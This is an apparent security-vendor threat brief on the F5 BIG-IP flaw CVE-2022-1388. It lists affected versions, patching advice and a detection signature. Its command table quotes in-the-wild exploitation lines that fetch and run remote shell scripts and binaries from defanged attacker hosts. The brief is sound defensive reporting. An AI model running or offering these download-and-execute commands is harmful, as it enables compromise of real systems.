This post is also available in: 日本語 (Japanese)
On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388. Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. This is a critical vulnerability that needs immediate attention, as it was given a 9.8 CVSS score. Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun.
Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (92570) and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts.
Unit 42 recommends customers upgrade to the latest release of F5 BIG-IP products. Palo Alto Networks Next Generation Firewall Threat Prevention customers are protected with Signature 92570.
Table of Contents
The F5 product vulnerable to CVE-2022-1388 is BIG-IP with the following versions:
- 16.1.0 - 16.1.2
- 15.1.0 - 15.1.5
- 14.1.0 - 14.1.4
- 13.1.0 - 13.1.4
- 12.1.0 - 12.1.6
- 11.6.1 - 11.6.5
The vulnerability exists within the iControl REST framework used by BIG-IP.
We recommend that customers update their F5 BIG-IP deployments to one of the following versions that have patches to mitigate CVE-2022-1388:
Until you can install the patched versions of BIG-IP, see the Mitigation section on the F5 security advisory for information on how to mitigate this vulnerability via a workaround to limit the vulnerable component to trusted networks.
In response to the F5 security advisory, Palo Alto Networks released the Threat Prevention signature F5 BIG-IP Authentication Bypass Vulnerability (92570) on May 9.
We observed this signature triggered 2,552 times between 4:47 and 14:00 UTC on May 10. We were able to analyze 2,151 packets that triggered the signature and observed both vulnerability scanning activity and active exploitation attempts.
Table 1 shows the commands that would be executed in the event of successful exploitation. These were found by analysis of the packet captures that triggered the F5 BIG-IP Authentication Bypass Vulnerability signature.
|19||curl -o- -L hxxp://20.239.193[.]47/kele.sh| sh > /dev/null 2>&1 &|
|11||find /usr/local/www -name *.php | xargs grep eval|
|3||curl -fsLk hxxps://transfer[.]sh/dlxo3I/1.sh | sh|
|1||wget hxxp://20.187.86[.]47/dadda;chmod 777 *;./dadda|
|1||curl -o- -L hxxp://20.239.193[.]47/kele1|sh|
Table 1. Commands observed in CVE-2022-1388 exploitation attempts.
Palo Alto Networks customers receive protections against the exploitation of this vulnerability in the following ways:
- Next-Generation Firewalls with a Threat Prevention security subscription (running Applications and Threat content update version 8567) can automatically block sessions related to this vulnerability using the F5 BIG-IP Authentication Bypass Vulnerability signature (Threat ID 92570).
Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.
Updated May 16, 2022